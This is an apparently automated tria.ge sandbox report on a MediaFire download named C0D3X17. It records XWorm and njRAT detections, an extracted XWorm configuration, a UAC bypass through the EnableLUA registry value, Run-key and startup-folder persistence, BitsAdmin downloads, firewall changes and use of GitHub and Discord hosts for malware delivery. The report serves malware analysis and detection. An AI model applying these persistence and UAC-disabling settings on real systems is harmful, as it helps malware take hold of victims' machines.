Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
251s -
max time network
255s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
04/02/2025, 16:35
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.mediafire.com/folder/kkoutc87ykjal/C0D3X17
Resource
win10v2004-20250129-en
General
-
Target
https://www.mediafire.com/folder/kkoutc87ykjal/C0D3X17
Malware Config
Extracted
xworm
5.0
1VeDwfujGeaxOsgJ
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000c000000023ca6-519.dat family_xworm behavioral1/memory/220-526-0x0000000000530000-0x000000000053E000-memory.dmp family_xworm -
Njrat family
-
UAC bypass 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Xworm family
-
pid Process 4164 powershell.exe 2268 powershell.exe 408 powershell.exe 1592 powershell.exe 2472 powershell.exe 1320 powershell.exe 2752 powershell.exe 3308 powershell.exe 2112 powershell.exe 3936 powershell.exe 2360 powershell.exe 4628 powershell.exe 3292 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 3772 bitsadmin.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1536 netsh.exe 2488 netsh.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation system.dll.exe Key value queried \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation host.exe Key value queried \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\Control Panel\International\Geo\Nation C0D3X17-NUKER.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5b4af3576e30808651ae14fbef1ee719.exe GameSDK.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5b4af3576e30808651ae14fbef1ee719.exe GameSDK.exe -
Executes dropped EXE 10 IoCs
pid Process 2844 C0D3X17-NUKER.exe 220 rundl32.exe 2896 Stable_Network.exe 4732 host.exe 4924 system.dll.exe 1900 CL_Debug_Log.txt 4624 GameSDK.exe 3808 python-installer.exe 2252 python-installer.exe 100 Antimalware Service Executable.exe -
Loads dropped DLL 2 IoCs
pid Process 4924 system.dll.exe 2252 python-installer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system.dll = "C:\\ProgramData\\Update.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b4af3576e30808651ae14fbef1ee719 = "\"C:\\ProgramData\\GameSDK.exe\" .." GameSDK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5b4af3576e30808651ae14fbef1ee719 = "\"C:\\ProgramData\\GameSDK.exe\" .." GameSDK.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce" python-installer.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 258 5052 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 255 raw.githubusercontent.com 236 raw.githubusercontent.com 237 raw.githubusercontent.com 245 discord.com 248 discord.com -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2308 cmd.exe 3736 cmd.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023ca7-531.dat autoit_exe behavioral1/files/0x0008000000023ced-704.dat autoit_exe behavioral1/files/0x0008000000023cec-720.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\JHwSHD1IYI.txt system.dll.exe File opened for modification C:\Windows\System32\JHwSHD1IYI.txt system.dll.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2380 tasklist.exe 2552 tasklist.exe -
Drops file in Windows directory 27 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e5a8e6b.msi msiexec.exe File created C:\Windows\Installer\e5a8e7a.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378} msiexec.exe File created C:\Windows\Installer\SourceHash{2F4E9933-7587-4D85-9BA1-F2903AFB36D8} msiexec.exe File opened for modification C:\Windows\Installer\e5a8e66.msi msiexec.exe File created C:\Windows\Installer\SourceHash{1DAEF824-881A-49C6-B91E-1D28877FF18D} msiexec.exe File created C:\Windows\Installer\SourceHash{08A1963D-07D1-4620-929C-385F6A307772} msiexec.exe File opened for modification C:\Windows\Installer\MSI9D1E.tmp msiexec.exe File created C:\Windows\Installer\e5a8e75.msi msiexec.exe File created C:\Windows\Installer\e5a8e66.msi msiexec.exe File created C:\Windows\Installer\e5a8e6f.msi msiexec.exe File opened for modification C:\Windows\Installer\e5a8e75.msi msiexec.exe File opened for modification C:\Windows\Installer\e5a8e7a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIEECA.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51} msiexec.exe File opened for modification C:\Windows\Installer\MSI91E1.tmp msiexec.exe File created C:\Windows\Installer\e5a8e70.msi msiexec.exe File opened for modification C:\Windows\Installer\e5a8e70.msi msiexec.exe File created C:\Windows\Installer\e5a8e79.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB24D.tmp msiexec.exe File created C:\Windows\Installer\e5a8e6a.msi msiexec.exe File created C:\Windows\Installer\e5a8e6b.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI94FF.tmp msiexec.exe File created C:\Windows\Installer\e5a8e74.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Stable_Network.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language host.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CL_Debug_Log.txt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C0D3X17-NUKER.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GameSDK.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 4420 taskkill.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378} python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\CPython-3.12 python-installer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)" python-installer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0" python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000f89fad82d72db01c489232b3a72db018b9d6b592377db0114000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Dependents python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}\Version = "3.12.6150.0" python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\ = "{1DAEF824-881A-49C6-B91E-1D28877FF18D}" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Version = "3.12.6150.0" python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\winmgmts:\HTOJJQCK\root\CIMV2 Stable_Network.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2748 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4512 msedge.exe 4512 msedge.exe 748 msedge.exe 748 msedge.exe 1944 identity_helper.exe 1944 identity_helper.exe 1504 msedge.exe 1504 msedge.exe 1660 msedge.exe 1660 msedge.exe 1660 msedge.exe 1660 msedge.exe 1040 msedge.exe 1040 msedge.exe 4164 powershell.exe 4164 powershell.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe 2896 Stable_Network.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1040 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs
pid Process 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 748 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe 5068 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2464 7zG.exe Token: 35 2464 7zG.exe Token: SeSecurityPrivilege 2464 7zG.exe Token: SeSecurityPrivilege 2464 7zG.exe Token: SeRestorePrivilege 3200 7zG.exe Token: 35 3200 7zG.exe Token: SeSecurityPrivilege 3200 7zG.exe Token: SeSecurityPrivilege 3200 7zG.exe Token: SeDebugPrivilege 220 rundl32.exe Token: SeDebugPrivilege 4164 powershell.exe Token: SeRestorePrivilege 1900 CL_Debug_Log.txt Token: 35 1900 CL_Debug_Log.txt Token: SeSecurityPrivilege 1900 CL_Debug_Log.txt Token: SeSecurityPrivilege 1900 CL_Debug_Log.txt Token: SeDebugPrivilege 2380 tasklist.exe Token: SeDebugPrivilege 4420 taskkill.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 2552 tasklist.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeIncreaseQuotaPrivilege 4536 WMIC.exe Token: SeSecurityPrivilege 4536 WMIC.exe Token: SeTakeOwnershipPrivilege 4536 WMIC.exe Token: SeLoadDriverPrivilege 4536 WMIC.exe Token: SeSystemProfilePrivilege 4536 WMIC.exe Token: SeSystemtimePrivilege 4536 WMIC.exe Token: SeProfSingleProcessPrivilege 4536 WMIC.exe Token: SeIncBasePriorityPrivilege 4536 WMIC.exe Token: SeCreatePagefilePrivilege 4536 WMIC.exe Token: SeBackupPrivilege 4536 WMIC.exe Token: SeRestorePrivilege 4536 WMIC.exe Token: SeShutdownPrivilege 4536 WMIC.exe Token: SeDebugPrivilege 4536 WMIC.exe Token: SeSystemEnvironmentPrivilege 4536 WMIC.exe Token: SeRemoteShutdownPrivilege 4536 WMIC.exe 